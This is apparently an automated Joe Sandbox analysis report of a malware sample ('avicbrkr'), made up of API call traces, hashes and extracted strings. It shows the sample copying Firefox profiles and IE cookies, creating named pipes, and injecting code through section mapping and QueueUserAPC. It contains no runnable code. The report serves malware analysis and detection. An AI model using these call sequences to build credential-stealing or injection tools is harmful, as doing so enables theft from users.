                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$Protectlstrlenmemcpymemset$AddressAllocErrorFileLastLibraryLoadModuleNameProc
                      • String ID:
                      • API String ID: 3816444689-0
                      • Opcode ID: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction ID: 93de27251ef7a5c3cddc38c0c27dc13e4c4a5a163c12a8e24408c513e8fcc30f
                      • Opcode Fuzzy Hash: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction Fuzzy Hash: A7118E71900616EBDB119B69CD14BAF7BB8AF50704F1844BAE800FB2E1EB79DD018B58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetLastError.KERNEL32(00000000,00000000,00001000,00000000,00001000,00000000,0039C828,00000000), ref: 0038919B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateErrorFreeLast
                      • String ID:
                      • API String ID: 3102831662-0
                      • Opcode ID: 3abed237ad3ef3787e11169a8544420048b8f4d79776ec87deb7ff1c52634793
                      • Instruction ID: 330b7bfa39714445023bb9f61048fc5bffde3f5a246f69c188c231d1a053e44a
                      • Opcode Fuzzy Hash: 3abed237ad3ef3787e11169a8544420048b8f4d79776ec87deb7ff1c52634793
                      • Instruction Fuzzy Hash: 3111947290020AABD713ABE8C889BAEB7FDEF85790F25449AE405DB241DB758E01C750
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,0037D7B1,00000000), ref: 00374F14
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateCloseQueryValuememcpy
                      • String ID:
                      • API String ID: 1003249125-0
                      • Opcode ID: 76fa1148184b3a50869274ef709c6c27a892f14593660e93a9857f2490e1de34
                      • Instruction ID: e2907161ff70b7a8866692578eb33db494075dfe18b795795f908a5d7008315e
                      • Opcode Fuzzy Hash: 76fa1148184b3a50869274ef709c6c27a892f14593660e93a9857f2490e1de34
                      • Instruction Fuzzy Hash: 6F017176600204FFDB23EF59DC82EEA77ACEB48350F108062F9059B251D7B5AD059B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1216685660.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1e0000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 940c53184e77ce8d119a6f88736106b85b7995e1c9a90103885ced06dc45f035
                      • Instruction ID: 5afa55514f7a80dfb4318cfe5bd48beb6acd91a0818e1a4e0a6cf625fb035d80
                      • Opcode Fuzzy Hash: 940c53184e77ce8d119a6f88736106b85b7995e1c9a90103885ced06dc45f035
                      • Instruction Fuzzy Hash: 35E06C6405E3C05FC70797788C71A913F766E8B20038F89CBD5C08F5BBC628985AE722
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Non-executed Functions

                      APIs
                      • lstrlen.KERNEL32(%APPDATA%), ref: 00371C6E
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00371CB9
                      • mbstowcs.NTDLL ref: 00371CCC
                      • lstrcatW.KERNEL32(00000000,0039E774), ref: 00371CDB
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00371CFF
                      • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00371D11
                      • lstrcatW.KERNEL32(00000000,003973F0), ref: 00371D33
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371D57
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00371D7D
                        • Part of subcall function 00371B89: RtlAllocateHeap.NTDLL(00000000,?), ref: 00371BC8
                        • Part of subcall function 00371B89: lstrcpyW.KERNEL32(00000000,00371DC8), ref: 00371BD9
                        • Part of subcall function 00371B89: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371BF0
                        • Part of subcall function 00371B89: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371C0A
                        • Part of subcall function 00371B89: CopyFileW.KERNEL32(?,00000000,00000000), ref: 00371C3A
                        • Part of subcall function 00371B89: HeapFree.KERNEL32(00000000,00000000), ref: 00371C48
                      • DeleteFileW.KERNEL32(?), ref: 00371DCC
                      • HeapFree.KERNEL32(00000000,?), ref: 00371DDA
                      • HeapFree.KERNEL32(00000000,?), ref: 00371DF6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFind$Free$AllocateCreateDirectory$CloseCriticalFirstNextObjectSectionSingleWaitlstrcatlstrlenmemset$CopyDeleteEnterLeavelstrcpymbstowcswcscpy
                      • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
                      • API String ID: 1381583133-4232923486
                      • Opcode ID: 211b98c645cc365d1ec2a5c36aa75100fcfbea4f278d8dbdfa0647299e16c161
                      • Instruction ID: 3b435d4c05cf2ac126bad58ce193cd6273a517b1ffb8e828e9be4880d85ae7df
                      • Opcode Fuzzy Hash: 211b98c645cc365d1ec2a5c36aa75100fcfbea4f278d8dbdfa0647299e16c161
                      • Instruction Fuzzy Hash: C1516272904214BFDB33EBA9DC49CEFBBBCEB85B00B10456AF505A22A0E6355D01DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 0037D836
                      • CreateMutexA.KERNEL32(00000000,00000001,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D86F
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D87A
                      • CloseHandle.KERNEL32(0039D260), ref: 0037D892
                        • Part of subcall function 0038834C: GetVersion.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00388397
                        • Part of subcall function 0038834C: GetModuleHandleA.KERNEL32(0039E01D,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003883C4
                        • Part of subcall function 0037BAAE: RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 0037BAC8
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D8EA
                      • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0037D92F
                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D944
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D94E
                      • CloseHandle.KERNEL32(00000000), ref: 0037D95C
                      • RtlAllocateHeap.NTDLL(00000000,00000043), ref: 0037DAFD
                        • Part of subcall function 0038DB9C: memcpy.NTDLL(0039D3CC,?,00000018,0037D9BD,?,?,00000000,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038DBAE
                        • Part of subcall function 0037D752: GetSystemTimeAsFileTime.KERNEL32(?,00000000,0037D9CC,?,pnls,?,00000001,0037D9CC), ref: 0037D786
                        • Part of subcall function 0037D752: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037D7E6
                        • Part of subcall function 0037B703: GetModuleHandleA.KERNEL32(0039E88E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B742
                        • Part of subcall function 0037B703: CreateThread.KERNEL32(00000000,00000000,00376E94,00000000,00000000,?), ref: 0037B777
                        • Part of subcall function 0037B703: CloseHandle.KERNEL32(00000000), ref: 0037B782
                        • Part of subcall function 0037B703: GetLastError.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B78A
                        • Part of subcall function 00373F05: RegQueryValueExA.KERNEL32(?,Client,00000000,?,0039C06C,0000005C,00000001,?,00000000,00000000,00000000,?,00000001,0037D9E0,?,0000005C), ref: 00373F50
                        • Part of subcall function 00373F05: RegCloseKey.ADVAPI32(?,?,00000001,0037D9E0,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00373F9D
                        • Part of subcall function 00373F05: wsprintfA.USER32 ref: 00374011
                      • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0037D9E9
                      • LoadLibraryA.KERNEL32(0039E000), ref: 0037DA84
                        • Part of subcall function 0037C19E: CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0039D2D8,00000001), ref: 0037C1C5
                        • Part of subcall function 0037C19E: CreateThread.KERNEL32(00000000,00000000,0037BE82,00000000,00000000,0000005C), ref: 0037C1DF
                        • Part of subcall function 0037C19E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C1F0
                        • Part of subcall function 0037C19E: CloseHandle.KERNEL32(00000000), ref: 0037C1F9
                        • Part of subcall function 0037C19E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C201
                        • Part of subcall function 00371E8C: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                        • Part of subcall function 00371E8C: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 00371E8C: lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 00371E8C: HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                      • wsprintfA.USER32 ref: 0037DB25
                        • Part of subcall function 0037D383: StrChrA.SHLWAPI(?,00000020), ref: 0037D3F3
                        • Part of subcall function 0037D383: HeapFree.KERNEL32(00000000,?,00000125), ref: 0037D43B
                        • Part of subcall function 0038C47E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0039D314,00004A28,0038BC8B,0038BCA3,0037DA5A,?,0000005C,?,0037DDEC,?), ref: 0038CCD5
                        • Part of subcall function 0038C47E: CreateThread.KERNEL32(00000000,00000000,0038CAE5,0039D370,00000000,0039D374), ref: 0038CCF6
                        • Part of subcall function 0038C47E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038CD05
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCreateErrorHandleLast$Close$Free$Thread$ModuleProcessQueryTimewsprintf$EventExchangeFileInformationInterlockedLibraryLoadMutexNamedOpenPipeSystemValueVersionlstrcpymemcpymemset
                      • String ID: gU9
                      • API String ID: 2539185180-705701294
                      • Opcode ID: cb2a260ef1b0de75e9c4ba086c5a263ac535d19bdec2eedc1348aa5790934934
                      • Instruction ID: 477f24bca4b02d6ccf970bd73cc3fd74e1bc7e7fe949ed65a929fc225b3f4eed
                      • Opcode Fuzzy Hash: cb2a260ef1b0de75e9c4ba086c5a263ac535d19bdec2eedc1348aa5790934934
                      • Instruction Fuzzy Hash: DB91C170605215AFC733EF65EC8A92ABBBCEF45B40F12881BF149D7260D77A9841CB91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 003871C1
                      • FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                      • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                      • FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                      • WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                      • FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmemset$AllocateEnterFreeLeavewcscpy
                      • String ID: R9
                      • API String ID: 2408353863-134138977
                      • Opcode ID: fba8474cab84aa07418248681570738b73a7a6731ccf09bc16691463138de926
                      • Instruction ID: f07c87a0d59e3e6794e912fed6c4806385b066c27e44bb69ed203780f093a332
                      • Opcode Fuzzy Hash: fba8474cab84aa07418248681570738b73a7a6731ccf09bc16691463138de926
                      • Instruction Fuzzy Hash: D0817E71518305AFC762AF68DC84A1BBBEAFF88300F154C69F88996262D775D805CB92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038DEC8: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 0038DF23
                        • Part of subcall function 0038DEC8: memset.NTDLL ref: 0038DF48
                        • Part of subcall function 0038DEC8: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DF64
                        • Part of subcall function 0038DEC8: NtClose.NTDLL(?), ref: 0038DF78
                      • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                      • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CE4F: GetModuleHandleA.KERNEL32(0039E8AE,00083097,?,0038D17F,?,?,00000000), ref: 0038CE82
                        • Part of subcall function 0038CE4F: memcpy.NTDLL(0039F155,0039D3E4,00000018,0039F133,0039F155,0039F14A,?,0038D17F,?,?,00000000), ref: 0038CEED
                      • memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 00388E34: memset.NTDLL ref: 00388E53
                        • Part of subcall function 0038CEFC: memcpy.NTDLL(?,0039D3FC,00000018,?,0039F133,?,0039F155,?,0039F14A,?,0038D177,?,?,?,00000000), ref: 0038CF8D
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                      • CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                      • memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038DE89: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                        • Part of subcall function 0038DE89: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                        • Part of subcall function 0038DF87: memcpy.NTDLL(0038DC2F,0038DC37,66986600,00083097,?,?,?,?,00000000), ref: 0038DFF5
                        • Part of subcall function 0038DF87: memcpy.NTDLL(00000000,?,66986600,00083097,?,?,?,?,00000000), ref: 0038E012
                        • Part of subcall function 0038DF87: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 0038E054
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID: pnls
                      • API String ID: 17049359-141991303
                      • Opcode ID: 7e69ea4089918cfac144c48057f68d2d8ae1688c864d5e76d0fa33a3cfcbdcad
                      • Instruction ID: 1e0a9feaea0fd0114e42aa2e0424c5f21b6b4eaab25e569a8a0e2a02a176ba4d
                      • Opcode Fuzzy Hash: 7e69ea4089918cfac144c48057f68d2d8ae1688c864d5e76d0fa33a3cfcbdcad
                      • Instruction Fuzzy Hash: B4814EB1900309DFDF22EFA8CC85AAEBBB5FF04304F1545A9E511AB291D731EA44DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F3ED
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F423
                      • GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F431
                      • RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F448
                      • GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F459
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038F47F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateComputerFreeName
                      • String ID: Client$[[9
                      • API String ID: 3439771632-1294312253
                      • Opcode ID: a4199388552ef7db5850ad4d1334752822276f566e6a6693b9d22e34f0c38ef6
                      • Instruction ID: f71fe17704777c0e16083d03429a90fb91219123944cd4bef4c9e8826aaf2aa8
                      • Opcode Fuzzy Hash: a4199388552ef7db5850ad4d1334752822276f566e6a6693b9d22e34f0c38ef6
                      • Instruction Fuzzy Hash: C83105B6910209EFDB02EFB5DD858AEBBFDEB48300B1184AAE501D3210E735EE419B10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000002,003994E4,00000001), ref: 0039061B
                      • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 003906CC
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • LoadLibraryA.KERNEL32(00000000), ref: 00390669
                      • GetProcAddress.KERNEL32(00000000,0039F2BE,?,00000008,?,00000001), ref: 0039067B
                      • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0039069A
                      • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 003906AC
                      • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 003906B4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapLastLibrary$AddressAllocateCloseLoadOpenProc
                      • String ID: o[9
                      • API String ID: 2182076089-3128973720
                      • Opcode ID: d70d5226a6fb3b380f4609126c0411f3cd274c0a240fe756430aa71abd69626f
                      • Instruction ID: c02349294015d533819e16c20c6b151e90b6358c4c40d6ed5b722c555b01d33d
                      • Opcode Fuzzy Hash: d70d5226a6fb3b380f4609126c0411f3cd274c0a240fe756430aa71abd69626f
                      • Instruction Fuzzy Hash: BB217FB2904228BFCF236BA99C49CAEBF7CEBC5750F114166F905A2261D7324E50DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0063271B: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00632776
                        • Part of subcall function 0063271B: memset.NTDLL ref: 0063279B
                        • Part of subcall function 0063271B: RtlNtStatusToDosError.NTDLL(00000000), ref: 006327B7
                        • Part of subcall function 0063271B: NtClose.NTDLL(?), ref: 006327CB
                      • memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                      • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631ADD: GetModuleHandleA.KERNEL32(006380DB,?,CCCCFEEB,00631E0D,?,?,?,00000000), ref: 00631B10
                        • Part of subcall function 00631ADD: memcpy.NTDLL(?,006375E0,00000018,0063845C,00638400,00638451), ref: 00631B7B
                      • memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 006338AE: memset.NTDLL ref: 006338CD
                        • Part of subcall function 00631B8A: memcpy.NTDLL(CCCCFEEB,006375F8,00000018,CCCCFEEB,0063845C,CCCCFEEB,00638400,CCCCFEEB,00638451,CCCCFEEB,00631E05,?,00632386,?,?,00000000), ref: 00631C1B
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                      • CloseHandle.KERNEL32(00000000), ref: 00631E61
                      • memset.NTDLL ref: 00631E75
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 006326DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                        • Part of subcall function 006326DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                        • Part of subcall function 006327DA: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 00632848
                        • Part of subcall function 006327DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 00632865
                        • Part of subcall function 006327DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 006328A7
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID:
                      • API String ID: 17049359-0
                      • Opcode ID: 74d5ceb936e7aa8e48ea4623d0794fb438fe845dc45f0238a9a7531a5a2460ec
                      • Instruction ID: b0acc1177a07dfd3c90fca9272c326804635b6b7046c9c88565e4183b1b60b97
                      • Opcode Fuzzy Hash: 74d5ceb936e7aa8e48ea4623d0794fb438fe845dc45f0238a9a7531a5a2460ec
                      • Instruction Fuzzy Hash: 86813BB0D0060AEFCB11DF98C885AEEBBB6FF05304F144569E911AB351D735AA44DB94
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0037B684
                      • GetModuleHandleA.KERNEL32(0039E01D,0039F030,00000004,00000000,00000000,00000000,00000000), ref: 0037B69B
                      • GetProcAddress.KERNEL32(00000000), ref: 0037B6A2
                      • Thread32First.KERNEL32(?,0000001C), ref: 0037B6B2
                      • OpenThread.KERNEL32(001F03FF,00000000,00000000,?,0000001C), ref: 0037B6CD
                      • QueueUserAPC.KERNEL32(0000005C,00000000,00000000), ref: 0037B6DE
                      • Thread32Next.KERNEL32(?,0000001C), ref: 0037B6EE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                      • String ID:
                      • API String ID: 190292596-0
                      • Opcode ID: 115c196f44d43cfb2faaa8e18839e9ca4f9a8072e561f4434f957d0c83c8fb9e
                      • Instruction ID: 350d73964c993811327893ec8d1f99fcc01ea6b76de9dba056540ae1c83045ec
                      • Opcode Fuzzy Hash: 115c196f44d43cfb2faaa8e18839e9ca4f9a8072e561f4434f957d0c83c8fb9e
                      • Instruction Fuzzy Hash: 9A118B72900108EFDF13AFA4DC85EAEBB7CFB08355F004126FA05A61A0D7758D918BA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00386C2D
                      • FlushFileBuffers.KERNEL32(00000000), ref: 00386C9A
                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 00386CA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: BuffersErrorFileFlushLastmemset
                      • String ID: K$P
                      • API String ID: 3817869962-420285281
                      • Opcode ID: 5249a4821e8631d228a0f16cb47993e871c11d6fe5a5d3e497827e834bda585a
                      • Instruction ID: e03b023dfdc23a42408a926453bccce611e10efb3de1049787f498a54b4c5de7
                      • Opcode Fuzzy Hash: 5249a4821e8631d228a0f16cb47993e871c11d6fe5a5d3e497827e834bda585a
                      • Instruction Fuzzy Hash: E7419F70A007059FDB22DFA5C98566EBBF5FF18B00F55486DE48693A81E734A908DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: 664bb23cc76c344d041eaa7c6ad639a7932c0023f778a0ab912cc1f37b02c0fa
                      • Instruction ID: 79b36cc67bf16bdddcd87ad0c63db15d71e48a49261bf86d14c89d0c4df94612
                      • Opcode Fuzzy Hash: 664bb23cc76c344d041eaa7c6ad639a7932c0023f778a0ab912cc1f37b02c0fa
                      • Instruction Fuzzy Hash: F0F1F231900799CFCB32DF68C9846AABBF4FF51700F2449ADD6D796B81D232AA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
